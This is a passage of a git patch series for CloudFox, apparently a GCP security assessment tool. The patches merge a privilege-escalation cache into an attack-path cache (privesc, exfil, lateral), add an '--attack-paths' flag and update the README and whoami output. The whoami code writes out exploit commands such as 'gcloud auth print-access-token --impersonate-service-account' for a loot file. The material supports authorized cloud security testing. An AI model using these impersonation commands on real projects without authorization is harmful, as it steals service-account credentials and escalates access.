:= foldersClient.SearchFolders(ctx, searchReq) - for { - folder, err := it.Next() - if err == iterator.Done { - break - } - if err != nil { - parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_PRIVESC_MODULE_NAME, "Could not search folders") - break - } - - folderID := strings.TrimPrefix(folder.Name, "folders/") - folderNames[folderID] = folder.DisplayName - - // Get IAM policy for this folder - policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ - Resource: folder.Name, - }) - if err != nil { - continue - } - - // Analyze each binding for privesc - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, "") - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForPrivescWithScope( - member, binding.Role, permissions, "", - "folder", folderID, folder.DisplayName, - ) - paths = append(paths, memberPaths...) - } - } - } - - return paths, folderNames, nil -} - -// CombinedPrivescAnalysis performs privilege escalation analysis across all scopes (org, folder, project) -func (s *PrivescService) CombinedPrivescAnalysis(ctx context.Context, projectIDs []string, projectNames map[string]string) (*CombinedPrivescData, error) { - result := &CombinedPrivescData{ - OrgPaths: []PrivescPath{}, - FolderPaths: []PrivescPath{}, - ProjectPaths: []PrivescPath{}, - AllPaths: []PrivescPath{}, - OrgNames: make(map[string]string), - FolderNames: make(map[string]string), - OrgIDs: []string{}, - } - - // Analyze organization-level IAM - orgPaths, orgNames, orgIDs, err := s.AnalyzeOrganizationPrivesc(ctx) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Could not analyze organization privesc") - } else { - result.OrgPaths = orgPaths - result.OrgNames = orgNames - result.OrgIDs = orgIDs - result.AllPaths = append(result.AllPaths, orgPaths...) - } - - // Analyze folder-level IAM - folderPaths, folderNames, err := s.AnalyzeFolderPrivesc(ctx) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Could not analyze folder privesc") - } else { - result.FolderPaths = folderPaths - result.FolderNames = folderNames - result.AllPaths = append(result.AllPaths, folderPaths...) - } - - // Analyze project-level IAM - for _, projectID := range projectIDs { - projectName := projectID - if name, ok := projectNames[projectID]; ok { - projectName = name - } - - paths, err := s.AnalyzeProjectPrivescWithName(projectID, projectName) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, - fmt.Sprintf("Could not analyze privesc for project %s", projectID)) - continue - } - - result.ProjectPaths = append(result.ProjectPaths, paths...) - result.AllPaths = append(result.AllPaths, paths...) - } - - return result, nil -} diff --git a/internal/gcp/attackpath_cache.go b/internal/gcp/attackpath_cache.go new file mode 100644 index 00000000..adb1602c --- /dev/null +++ b/internal/gcp/attackpath_cache.go @@ -0,0 +1,418 @@ +package gcpinternal + +import ( + "context" + "fmt" + "strings" + "sync" +) + +// AttackPathType represents the type of attack path +type AttackPathType string + +const ( + AttackPathPrivesc AttackPathType = "privesc" + AttackPathExfil AttackPathType = "exfil" + AttackPathLateral AttackPathType = "lateral" +) + +// AttackPathCache holds cached attack path analysis results for all types +// This allows modules to quickly check if a service account or principal has +// privesc/exfil/lateral movement potential without re-running the full analysis +type AttackPathCache struct { + // ServiceAccountPaths maps service account email -> PathType -> methods + // Example: "sa@project.iam.gserviceaccount.com" -> "privesc" -> [methods...] + ServiceAccountPaths map[string]map[AttackPathType][]AttackMethod + + // PrincipalPaths maps any principal (user, group, SA) -> PathType -> methods + // This includes the full principal string like "serviceAccount:sa@project.iam.gserviceaccount.com" + PrincipalPaths map[string]map[AttackPathType][]AttackMethod + + // Quick lookups by attack type for summary stats + PrivescCount int + ExfilCount int + LateralCount int + + // Populated indicates whether the cache has been populated with data + Populated bool + + mu sync.RWMutex +} + +// AttackMethod represents a single attack method (privesc, exfil, or lateral) +type AttackMethod struct { + Method string // e.g., "CreateServiceAccountKey", "ExportCloudSQL" + PathType AttackPathType // "privesc", "exfil", "lateral" + Category string // e.g., "SA Impersonation", "Database", "Network" + RiskLevel string // "CRITICAL", "HIGH", "MEDIUM" + Target string // What the method targets + Permissions []string // Permissions that enable this method + ScopeType string // "organization", "folder", "project", "resource" + ScopeID string // The scope identifier +} + +// NewAttackPathCache creates a new empty attack path cache +func NewAttackPathCache() *AttackPathCache { + return &AttackPathCache{ + ServiceAccountPaths: make(map[string]map[AttackPathType][]AttackMethod), + PrincipalPaths: make(map[string]map[AttackPathType][]AttackMethod), + Populated: false, + } +} + +// AddAttackPath adds an attack path to the cache +// principal should be the full member string (e.g., "serviceAccount:sa@project.iam.gserviceaccount.com") +func (c *AttackPathCache) AddAttackPath(principal string, method AttackMethod) { + c.mu.Lock() + defer c.mu.Unlock() + + // Initialize maps if needed + if c.PrincipalPaths[principal] == nil { + c.PrincipalPaths[principal] = make(map[AttackPathType][]AttackMethod) + } + c.PrincipalPaths[principal][method.PathType] = append(c.PrincipalPaths[principal][method.PathType], method) + + // Update counts + switch method.PathType { + case AttackPathPrivesc: + c.PrivescCount++ + case AttackPathExfil: + c.ExfilCount++ + case AttackPathLateral: + c.LateralCount++ + } + + // If it's a service account, also add to the SA-specific map + if strings.HasPrefix(principal, "serviceAccount:") { + email := strings.TrimPrefix(principal, "serviceAccount:") + if c.ServiceAccountPaths[email] == nil { + c.ServiceAccountPaths[email] = make(map[AttackPathType][]AttackMethod) + } + c.ServiceAccountPaths[email][method.PathType] = append(c.ServiceAccountPaths[email][method.PathType], method) + } + + // Also check if the principal itself looks like an email (for cleaned member names) + if strings.Contains(principal, "@") && strings.Contains(principal, ".iam.gserviceaccount.com") { + if c.ServiceAccountPaths[principal] == nil { + c.ServiceAccountPaths[principal] = make(map[AttackPathType][]AttackMethod) + } + c.ServiceAccountPaths[principal][method.PathType] = append(c.ServiceAccountPaths[principal][method.PathType], method) + } +} + +// MarkPopulated marks the cache as populated +func (c *AttackPathCache) MarkPopulated() { + c.mu.Lock() + defer c.mu.Unlock() + c.Populated = true +} + +// IsPopulated returns whether the cache has been populated +func (c *AttackPathCache) IsPopulated() bool { + c.mu.RLock() + defer c.mu.RUnlock() + return c.Populated +} + +// HasAttackPath checks if a service account has any attack path of the specified type +// Returns (hasPath bool, methods []AttackMethod) +func (c *AttackPathCache) HasAttackPath(serviceAccount string, pathType AttackPathType) (bool, []AttackMethod) { + c.mu.RLock() + defer c.mu.RUnlock() + + // Check direct match + if pathMap, ok := c.ServiceAccountPaths[serviceAccount]; ok { + if methods, ok := pathMap[pathType]; ok && len(methods) > 0 { + return true, methods + } + } + + // Check with serviceAccount: prefix + prefixed := "serviceAccount:" + serviceAccount + if pathMap, ok := c.PrincipalPaths[prefixed]; ok { + if methods, ok := pathMap[pathType]; ok && len(methods) > 0 { + return true, methods + } + } + + return false, nil +} + +// HasAnyAttackPath checks if a service account has any attack path of any type +// Returns (hasPath bool, pathTypes []AttackPathType) +func (c *AttackPathCache) HasAnyAttackPath(serviceAccount string) (bool, []AttackPathType) { + c.mu.RLock() + defer c.mu.RUnlock() + + var pathTypes []AttackPathType + + // Check direct match + if pathMap, ok := c.ServiceAccountPaths[serviceAccount]; ok { + for pt, methods := range pathMap { + if len(methods) > 0 { + pathTypes = append(pathTypes, pt) + } + } + } + + // Check with serviceAccount: prefix if no direct match + if len(pathTypes) == 0 { + prefixed := "serviceAccount:" + serviceAccount + if pathMap, ok := c.PrincipalPaths[prefixed]; ok { + for pt, methods := range pathMap { + if len(methods) > 0 { + pathTypes = append(pathTypes, pt) + } + } + } + } + + return len(pathTypes) > 0, pathTypes +} + +// HasPrivesc checks if a service account has any privilege escalation potential +// Backward compatible with old PrivescCache API +func (c *AttackPathCache) HasPrivesc(serviceAccount string) (bool, []AttackMethod) { + return c.HasAttackPath(serviceAccount, AttackPathPrivesc) +} + +// HasExfil checks if a service account has any data exfiltration potential +func (c *AttackPathCache) HasExfil(serviceAccount string) (bool, []AttackMethod) { + return c.HasAttackPath(serviceAccount, AttackPathExfil) +} + +// HasLateral checks if a service account has any lateral movement potential +func (c *AttackPathCache) HasLateral(serviceAccount string) (bool, []AttackMethod) { + return c.HasAttackPath(serviceAccount, AttackPathLateral) +} + +// HasAttackPathForPrincipal checks if any principal (user, group, SA) has attack path potential +func (c *AttackPathCache) HasAttackPathForPrincipal(principal string, pathType AttackPathType) (bool, []AttackMethod) { + c.mu.RLock() + defer c.mu.RUnlock() + + if pathMap, ok := c.PrincipalPaths[principal]; ok { + if methods, ok := pathMap[pathType]; ok && len(methods) > 0 { + return true, methods + } + } + + return false, nil +} + +// HasPrivescForPrincipal checks if any principal has privesc potential +// Backward compatible with old PrivescCache API +func (c *AttackPathCache) HasPrivescForPrincipal(principal string) (bool, []AttackMethod) { + return c.HasAttackPathForPrincipal(principal, AttackPathPrivesc) +} + +// GetAllAttackPathsForPrincipal returns all attack paths for a principal across all types +func (c *AttackPathCache) GetAllAttackPathsForPrincipal(principal string) map[AttackPathType][]AttackMethod { + c.mu.RLock() + defer c.mu.RUnlock() + + if pathMap, ok := c.PrincipalPaths[principal]; ok { + // Return a copy to avoid race conditions + result := make(map[AttackPathType][]AttackMethod) + for pt, methods := range pathMap { + result[pt] = append([]AttackMethod{}, methods...) + } + return result + } + + return nil +} + +// GetAttackSummary returns a summary string for a service account's attack potential +// Returns: "Yes (P:3 E:2 L:1)" for counts by type, "No" if none, "-" if cache not populated +func (c *AttackPathCache) GetAttackSummary(serviceAccount string) string { + if !c.IsPopulated() { + return "-" + } + + hasAny, pathTypes := c.HasAnyAttackPath(serviceAccount) + if !hasAny { + return "No" + } + + var parts []string + for _, pt := range pathTypes { + _, methods := c.HasAttackPath(serviceAccount, pt) + if len(methods) > 0 { + switch pt { + case AttackPathPrivesc: + parts = append(parts, fmt.Sprintf("P:%d", len(methods))) + case AttackPathExfil: + parts = append(parts, fmt.Sprintf("E:%d", len(methods))) + case AttackPathLateral: + parts = append(parts, fmt.Sprintf("L:%d", len(methods))) + } + } + } + + if len(parts) == 0 { + return "No" + } + + return "Yes (" + strings.Join(parts, " ") + ")" +} + +// GetPrivescSummary returns a summary string for privesc only (backward compatible) +func (c *AttackPathCache) GetPrivescSummary(serviceAccount string) string { + if !c.IsPopulated() { + return "-" + } + + hasPrivesc, methods := c.HasPrivesc(serviceAccount) + if !hasPrivesc || len(methods) == 0 { + return "No" + } + + return "Yes" +} + +// GetPrivescSummaryWithCount returns a summary with count (backward compatible) +func (c *AttackPathCache) GetPrivescSummaryWithCount(serviceAccount string) string { + if !c.IsPopulated() { + return "-" + } + + hasPrivesc, methods := c.HasPrivesc(serviceAccount) + if !hasPrivesc || len(methods) == 0 { + return "No" + } + + uniqueMethods := make(map[string]bool) + for _, m := range methods { + uniqueMethods[m.Method] = true + } + + return fmt.Sprintf("Yes (%d)", len(uniqueMethods)) +} + +// GetHighestRiskLevel returns the highest risk level for a service account across all attack types +func (c *AttackPathCache) GetHighestRiskLevel(serviceAccount string) string { + c.mu.RLock() + defer c.mu.RUnlock() + + riskOrder := map[string]int{"CRITICAL": 3, "HIGH": 2, "MEDIUM": 1, "LOW": 0} + highestRisk := "" + highestOrder := -1 + + // Check all path types + for _, pathType := range []AttackPathType{AttackPathPrivesc, AttackPathExfil, AttackPathLateral} { + hasPath, methods := c.HasAttackPath(serviceAccount, pathType) + if !hasPath { + continue + } + for _, m := range methods { + if order, ok := riskOrder[m.RiskLevel]; ok && order > highestOrder { + highestOrder = order + highestRisk = m.RiskLevel + } + } + } + + return highestRisk +} + +// GetMethodNames returns a list of unique method names for a service account by attack type +func (c *AttackPathCache) GetMethodNames(serviceAccount string, pathType AttackPathType) []string { + hasPath, methods := c.HasAttackPath(serviceAccount, pathType) + if !hasPath { + return nil + } + + uniqueMethods := make(map[string]bool) + var result []string + for _, m := range methods { + if !uniqueMethods[m.Method] { + uniqueMethods[m.Method] = true + result = append(result, m.Method) + } + } + + return result +} + +// AttackPathInfo is a minimal representation of an attack path for cache population +// This allows the cache to be populated without importing the service packages +type AttackPathInfo struct { + Principal string + PrincipalType string + Method string + PathType AttackPathType + Category string + RiskLevel string + Target string + Permissions []string + ScopeType string + ScopeID string +} + +// PopulateFromPaths populates the cache from a list of attack path info +func (c *AttackPathCache) PopulateFromPaths(paths []AttackPathInfo) { + for _, path := range paths { + method := AttackMethod{ + Method: path.Method, + PathType: path.PathType, + Category: path.Category, + RiskLevel: path.RiskLevel, + Target: path.Target, + Permissions: path.Permissions, + ScopeType: path.ScopeType, + ScopeID: path.ScopeID, + } + + // Build the full principal string + principal := path.Principal + if path.PrincipalType == "serviceAccount" && !strings.HasPrefix(principal, "serviceAccount:") { + principal = "serviceAccount:" + principal + } else if path.PrincipalType == "user" && !strings.HasPrefix(principal, "user:") { + principal = "user:" + principal + } else if path.PrincipalType == "group" && !strings.HasPrefix(principal, "group:") { + principal = "group:" + principal + } + + c.AddAttackPath(principal, method) + } + c.MarkPopulated() +} + +// GetStats returns statistics about the cache +func (c *AttackPathCache) GetStats() (privesc, exfil, lateral int) { + c.mu.RLock() + defer c.mu.RUnlock() + return c.PrivescCount, c.ExfilCount, c.LateralCount +} + +// Context key for attack path cache +type attackPathCacheKey struct{} + +// GetAttackPathCacheFromContext retrieves the attack path cache from context +func GetAttackPathCacheFromContext(ctx context.Context) *AttackPathCache { + if cache, ok := ctx.Value(attackPathCacheKey{}).(*AttackPathCache); ok { + return cache + } + return nil +} + +// SetAttackPathCacheInContext returns a new context with the attack path cache +func SetAttackPathCacheInContext(ctx context.Context, cache *AttackPathCache) context.Context { + return context.WithValue(ctx, attackPathCacheKey{}, cache) +} + +// Backward compatibility: Keep PrivescCache context functions working +// They now use the unified AttackPathCache under the hood + +// GetPrivescCacheFromContext retrieves the attack path cache as a privesc cache interface +// This provides backward compatibility for code using the old PrivescCache +func GetPrivescCacheFromContext(ctx context.Context) *AttackPathCache { + return GetAttackPathCacheFromContext(ctx) +} + +// SetPrivescCacheInContext sets the attack path cache in context +// This provides backward compatibility for code using the old PrivescCache +func SetPrivescCacheInContext(ctx context.Context, cache *AttackPathCache) context.Context { + return SetAttackPathCacheInContext(ctx, cache) +} diff --git a/internal/gcp/privesc_cache.go b/internal/gcp/privesc_cache.go index 451e73d4..461b0ab3 100644 --- a/internal/gcp/privesc_cache.go +++ b/internal/gcp/privesc_cache.go @@ -1,241 +1,18 @@ package gcpinternal -import ( - "context" - "strings" - "sync" -) +// This file provides backward compatibility aliases for the unified AttackPathCache. +// All new code should use AttackPathCache and related types directly. -// PrivescCache holds cached privilege escalation analysis results -// This allows modules to quickly check if a service account or principal has privesc potential -// without re-running the full analysis -type PrivescCache struct { - // ServiceAccountPrivesc maps service account email -> list of privesc methods - // Example: "sa@project.iam.gserviceaccount.com" -> ["CreateServiceAccountKey", "GetServiceAccountAccessToken"] - ServiceAccountPrivesc map[string][]PrivescMethod +// PrivescMethod is kept for backward compatibility +// DEPRECATED: Use AttackMethod instead +type PrivescMethod = AttackMethod - // PrincipalPrivesc maps any principal (user, group, SA) -> list of privesc methods - // This includes the full principal string like "serviceAccount:sa@project.iam.gserviceaccount.com" - PrincipalPrivesc map[string][]PrivescMethod +// PrivescCache is an alias to AttackPathCache for backward compatibility +// DEPRECATED: Use AttackPathCache instead +type PrivescCache = AttackPathCache - // Populated indicates whether the cache has been populated with privesc data - Populated bool - - mu sync.RWMutex -} - -// PrivescMethod represents a single privilege escalation method -type PrivescMethod struct { - Method string // e.g., "CreateServiceAccountKey", "GetServiceAccountAccessToken" - RiskLevel string // "CRITICAL", "HIGH", "MEDIUM" - Target string // What the method targets - Permissions []string // Permissions that enable this method -} - -// NewPrivescCache creates a new empty privesc cache -func NewPrivescCache() *PrivescCache { - return &PrivescCache{ - ServiceAccountPrivesc: make(map[string][]PrivescMethod), - PrincipalPrivesc: make(map[string][]PrivescMethod), - Populated: false, - } -} - -// AddPrivescPath adds a privilege escalation path to the cache -// principal should be the full member string (e.g., "serviceAccount:sa@project.iam.gserviceaccount.com") -func (c *PrivescCache) AddPrivescPath(principal string, method PrivescMethod) { - c.mu.Lock() - defer c.mu.Unlock() - - // Add to principal map - c.PrincipalPrivesc[principal] = append(c.PrincipalPrivesc[principal], method) - - // If it's a service account, also add to the SA-specific map - if strings.HasPrefix(principal, "serviceAccount:") { - email := strings.TrimPrefix(principal, "serviceAccount:") - c.ServiceAccountPrivesc[email] = append(c.ServiceAccountPrivesc[email], method) - } - - // Also check if the principal itself looks like an email (for cleaned member names) - if strings.Contains(principal, "@") && strings.Contains(principal, ".iam.gserviceaccount.com") { - c.ServiceAccountPrivesc[principal] = append(c.ServiceAccountPrivesc[principal], method) - } -} - -// MarkPopulated marks the cache as populated -func (c *PrivescCache) MarkPopulated() { - c.mu.Lock() - defer c.mu.Unlock() - c.Populated = true -} - -// IsPopulated returns whether the cache has been populated -func (c *PrivescCache) IsPopulated() bool { - c.mu.RLock() - defer c.mu.RUnlock() - return c.Populated -} - -// HasPrivesc checks if a service account has any privilege escalation potential -// Returns (hasPrivesc bool, methods []PrivescMethod) -func (c *PrivescCache) HasPrivesc(serviceAccount string) (bool, []PrivescMethod) { - c.mu.RLock() - defer c.mu.RUnlock() - - // Check direct match - if methods, ok := c.ServiceAccountPrivesc[serviceAccount]; ok && len(methods) > 0 { - return true, methods - } - - // Check with serviceAccount: prefix - prefixed := "serviceAccount:" + serviceAccount - if methods, ok := c.PrincipalPrivesc[prefixed]; ok && len(methods) > 0 { - return true, methods - } - - return false, nil -} - -// HasPrivescForPrincipal checks if any principal (user, group, SA) has privesc potential -func (c *PrivescCache) HasPrivescForPrincipal(principal string) (bool, []PrivescMethod) { - c.mu.RLock() - defer c.mu.RUnlock() - - if methods, ok := c.PrincipalPrivesc[principal]; ok && len(methods) > 0 { - return true, methods - } - - return false, nil -} - -// GetPrivescSummary returns a summary string for a service account's privesc potential -// Returns: "Yes (3)" for 3 methods, "No" if none, "-" if cache not populated -func (c *PrivescCache) GetPrivescSummary(serviceAccount string) string { - if !c.IsPopulated() { - return "-" - } - - hasPrivesc, methods := c.HasPrivesc(serviceAccount) - if !hasPrivesc || len(methods) == 0 { - return "No" - } - - return "Yes" -} - -// GetPrivescSummaryWithCount returns a summary string with count -// Returns: "Yes (3)" for 3 methods, "No" if none, "-" if cache not populated -func (c *PrivescCache) GetPrivescSummaryWithCount(serviceAccount string) string { - if !c.IsPopulated() { - return "-" - } - - hasPrivesc, methods := c.HasPrivesc(serviceAccount) - if !hasPrivesc || len(methods) == 0 { - return "No" - } - - // Count unique methods - uniqueMethods := make(map[string]bool) - for _, m := range methods { - uniqueMethods[m.Method] = true - } - - if len(uniqueMethods) == 1 { - return "Yes (1)" - } - return "Yes (" + string(rune('0'+len(uniqueMethods))) + ")" -} - -// GetHighestRiskLevel returns the highest risk level for a service account -// Returns: "CRITICAL", "HIGH", "MEDIUM", or "" if no privesc -func (c *PrivescCache) GetHighestRiskLevel(serviceAccount string) string { - hasPrivesc, methods := c.HasPrivesc(serviceAccount) - if !hasPrivesc { - return "" - } - - riskOrder := map[string]int{"CRITICAL": 3, "HIGH": 2, "MEDIUM": 1, "LOW": 0} - highestRisk := "" - highestOrder := -1 - - for _, m := range methods { - if order, ok := riskOrder[m.RiskLevel]; ok && order > highestOrder { - highestOrder = order - highestRisk = m.RiskLevel - } - } - - return highestRisk -} - -// GetMethodNames returns a list of unique method names for a service account -func (c *PrivescCache) GetMethodNames(serviceAccount string) []string { - hasPrivesc, methods := c.HasPrivesc(serviceAccount) - if !hasPrivesc { - return nil - } - - uniqueMethods := make(map[string]bool) - var result []string - for _, m := range methods { - if !uniqueMethods[m.Method] { - uniqueMethods[m.Method] = true - result = append(result, m.Method) - } - } - - return result -} - -// PrivescPathInfo is a minimal representation of a privesc path for cache population -// This allows the cache to be populated without importing the privescService package -type PrivescPathInfo struct { - Principal string - PrincipalType string - Method string - RiskLevel string - Target string - Permissions []string -} - -// PopulateFromPaths populates the cache from a list of privesc path info -func (c *PrivescCache) PopulateFromPaths(paths []PrivescPathInfo) { - for _, path := range paths { - method := PrivescMethod{ - Method: path.Method, - RiskLevel: path.RiskLevel, - Target: path.Target, - Permissions: path.Permissions, - } - - // Build the full principal string - principal := path.Principal - if path.PrincipalType == "serviceAccount" && !strings.HasPrefix(principal, "serviceAccount:") { - principal = "serviceAccount:" + principal - } else if path.PrincipalType == "user" && !strings.HasPrefix(principal, "user:") { - principal = "user:" + principal - } else if path.PrincipalType == "group" && !strings.HasPrefix(principal, "group:") { - principal = "group:" + principal - } - - c.AddPrivescPath(principal, method) - } - c.MarkPopulated() -} - -// Context key for privesc cache -type privescCacheKey struct{} - -// GetPrivescCacheFromContext retrieves the privesc cache from context -func GetPrivescCacheFromContext(ctx context.Context) *PrivescCache { - if cache, ok := ctx.Value(privescCacheKey{}).(*PrivescCache); ok { - return cache - } - return nil -} - -// SetPrivescCacheInContext returns a new context with the privesc cache -func SetPrivescCacheInContext(ctx context.Context, cache *PrivescCache) context.Context { - return context.WithValue(ctx, privescCacheKey{}, cache) +// NewPrivescCache creates a new attack path cache (backward compatible) +// DEPRECATED: Use NewAttackPathCache instead +func NewPrivescCache() *AttackPathCache { + return NewAttackPathCache() } From 888649616f1dfc942c9bb4faab7e179c933529f5 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 16 Jan 2026 00:32:45 -0500 Subject: [PATCH 23/48] added attackpath flag --- cli/gcp.go | 34 ++++++++++++++++++---------------- 1 file changed, 18 insertions(+), 16 deletions(-) diff --git a/cli/gcp.go b/cli/gcp.go index 4d0655d6..fe7f2f42 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -33,8 +33,8 @@ var ( GCPWrapTable bool GCPFlatOutput bool - // Privesc analysis flag - GCPWithPrivesc bool + // Attack path analysis flag + GCPAttackPaths bool // misc options // GCPIgnoreCache bool @@ -115,14 +115,15 @@ var ( } } - // If --with-privesc flag is set, run privesc analysis and populate cache - // This allows individual modules to show the Priv Esc column - if GCPWithPrivesc && len(GCPProjectIDs) > 0 { - GCPLogger.InfoM("Running privilege escalation analysis (--with-privesc)...", "gcp") - privescCache := runPrivescAndPopulateCache(ctx) - if privescCache != nil && privescCache.IsPopulated() { - ctx = gcpinternal.SetPrivescCacheInContext(ctx, privescCache) - GCPLogger.SuccessM("Privesc cache populated - modules will show Priv Esc column", "gcp") + // If --attack-paths flag is set, run attack path analysis and populate cache + // This allows individual modules to show the Attack Paths column + if GCPAttackPaths && len(GCPProjectIDs) > 0 { + GCPLogger.InfoM("Running attack path analysis (privesc/exfil/lateral)...", "gcp") + attackPathCache := runAttackPathAnalysisAndPopulateCache(ctx) + if attackPathCache != nil && attackPathCache.IsPopulated() { + ctx = gcpinternal.SetAttackPathCacheInContext(ctx, attackPathCache) + privesc, exfil, lateral := attackPathCache.GetStats() + GCPLogger.SuccessM(fmt.Sprintf("Attack path cache populated: %d privesc, %d exfil, %d lateral - modules will show Attack Paths column", privesc, exfil, lateral), "gcp") } } @@ -222,12 +223,13 @@ var GCPAllChecksCommand = &cobra.Command{ privescCmd.Run(cmd, args) executedModules = append(executedModules, "privesc") - // After running privesc, populate cache from the analysis for other modules - privescCache := runPrivescAndPopulateCache(ctx) - if privescCache != nil && privescCache.IsPopulated() { - ctx = gcpinternal.SetPrivescCacheInContext(ctx, privescCache) + // After running privesc, populate attack path cache for other modules + attackPathCache := runAttackPathAnalysisAndPopulateCache(ctx) + if attackPathCache != nil && attackPathCache.IsPopulated() { + ctx = gcpinternal.SetAttackPathCacheInContext(ctx, attackPathCache) cmd.SetContext(ctx) - GCPLogger.SuccessM("Privesc cache populated - other modules will show Priv Esc column", "all-checks") + privesc, exfil, lateral := attackPathCache.GetStats() + GCPLogger.SuccessM(fmt.Sprintf("Attack path cache populated: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "all-checks") } GCPLogger.InfoM("", "all-checks") } @@ -392,7 +394,7 @@ func init() { // GCPCommands.PersistentFlags().IntVarP(&Goroutines, "max-goroutines", "g", 30, "Maximum number of concurrent goroutines") GCPCommands.PersistentFlags().BoolVarP(&GCPWrapTable, "wrap", "w", false, "Wrap table to fit in terminal (complicates grepping)") GCPCommands.PersistentFlags().BoolVar(&GCPFlatOutput, "flat-output", false, "Use legacy flat output structure instead of hierarchical per-project directories") - GCPCommands.PersistentFlags().BoolVar(&GCPWithPrivesc, "with-privesc", false, "Run privilege escalation analysis and add Priv Esc column to output (runs privesc first)") + GCPCommands.PersistentFlags().BoolVar(&GCPAttackPaths, "attack-paths", false, "Run attack path analysis (privesc/exfil/lateral) and add Attack Paths column to module output") // Available commands GCPCommands.AddCommand( From 35fca314757a6bccf29417952b5c3fca4ef213aa Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 16 Jan 2026 10:02:10 -0500 Subject: [PATCH 24/48] updated whoami counts --- README.md | 20 ++++++++++++++++++++ gcp/commands/whoami.go | 2 ++ 2 files changed, 22 insertions(+) diff --git a/README.md b/README.md index 7cea461f..f9feb73d 100644 --- a/README.md +++ b/README.md @@ -300,8 +300,28 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http | GCP | [backup-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#backup-inventory) | Enumerate backup policies, protected resources, and identify backup gaps | ## Attack Path Analysis + +CloudFox GCP uses a **unified attack path analysis** system that combines privilege escalation, lateral movement, and data exfiltration analysis. The three attack path modules share a common backend (`attackpathService`) that analyzes IAM policies across all 4 hierarchy levels: Organization → Folder → Project → Resource. + +### `--attack-paths` Global Flag + +When running compute/service modules, add `--attack-paths` to see attack path capabilities for service accounts: + +```bash +# Run instances module with attack path analysis +cloudfox gcp instances -p my-project --attack-paths + +# Run service accounts with attack paths +cloudfox gcp serviceaccounts --all-projects --attack-paths +``` + +This adds an **"Attack Paths"** column showing: `Yes (P:3 E:2 L:1)` where P=Privesc, E=Exfil, L=Lateral counts. + +**Modules supporting `--attack-paths`**: instances, serviceaccounts, functions, cloudrun, gke, composer, dataproc, dataflow, notebooks, cloudbuild, scheduler, appengine + | Provider | Command Name | Description | | - | - | - | +| GCP | [privesc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#privesc) | Identify privilege escalation paths (SA impersonation, key creation, IAM modification) | | GCP | [lateral-movement](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#lateral-movement) | Map lateral movement paths, credential theft vectors, and pivot opportunities | | GCP | [data-exfiltration](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#data-exfiltration) | Identify data exfiltration paths, potential vectors, and missing security hardening | | GCP | [public-access](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#public-access) | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index 2e8daccf..dd5a1a16 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1446,6 +1446,8 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { if m.Extended { identityBody = append(identityBody, []string{"Impersonation Targets", fmt.Sprintf("%d", len(m.ImpersonationTargets))}) identityBody = append(identityBody, []string{"Privilege Escalation Paths", fmt.Sprintf("%d", len(m.PrivEscPaths))}) + identityBody = append(identityBody, []string{"Lateral Movement Paths", fmt.Sprintf("%d", len(m.LateralMoveCapabilities))}) + identityBody = append(identityBody, []string{"Data Exfiltration Paths", fmt.Sprintf("%d", len(m.DataExfilCapabilities))}) } // Role bindings table From f82547b438d4934a52c4aed9babe82e90d01e9ba Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 16 Jan 2026 11:36:25 -0500 Subject: [PATCH 25/48] updated attackpath output --- gcp/commands/whoami.go | 161 ++++++++++++++++++++++------------------- 1 file changed, 86 insertions(+), 75 deletions(-) diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index dd5a1a16..f11f1783 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -122,11 +122,13 @@ type ImpersonationTarget struct { } type PrivilegeEscalationPath struct { - Name string + ProjectID string // GCP project ID + Permission string // The permission/method enabling privesc + Category string // Category of the privesc (SA Impersonation, Key Creation, etc.) Description string - Command string SourceRole string // The role that grants this potential path SourceScope string // Where the role is granted (project ID, folder, org) + Command string // Exploit command (for loot file only) Confidence string // "confirmed" (verified via API) or "potential" (inferred from role) RequiredPerms string // Specific permissions needed for this path } @@ -138,6 +140,8 @@ type DataExfilCapability struct { Category string RiskLevel string Description string + SourceRole string // The role/principal that grants this capability + SourceScope string // Where the role is granted (project, folder, org) } // LateralMoveCapability represents a lateral movement capability for the current identity @@ -147,6 +151,8 @@ type LateralMoveCapability struct { Category string RiskLevel string Description string + SourceRole string // The role/principal that grants this capability + SourceScope string // Where the role is granted (project, folder, org) } // ------------------------------ @@ -752,11 +758,13 @@ func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal for _, target := range m.ImpersonationTargets { if target.CanImpersonate { path := PrivilegeEscalationPath{ - Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), - Description: "Can generate access tokens for this service account", - Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + ProjectID: target.ProjectID, + Permission: "iam.serviceAccounts.getAccessToken", + Category: "SA Impersonation", + Description: fmt.Sprintf("Can generate access tokens for %s", target.ServiceAccount), SourceRole: "(via SA IAM policy)", SourceScope: fmt.Sprintf("project/%s", target.ProjectID), + Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), Confidence: "confirmed", RequiredPerms: "iam.serviceAccounts.getAccessToken", } @@ -765,11 +773,13 @@ func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal if target.CanCreateKeys { path := 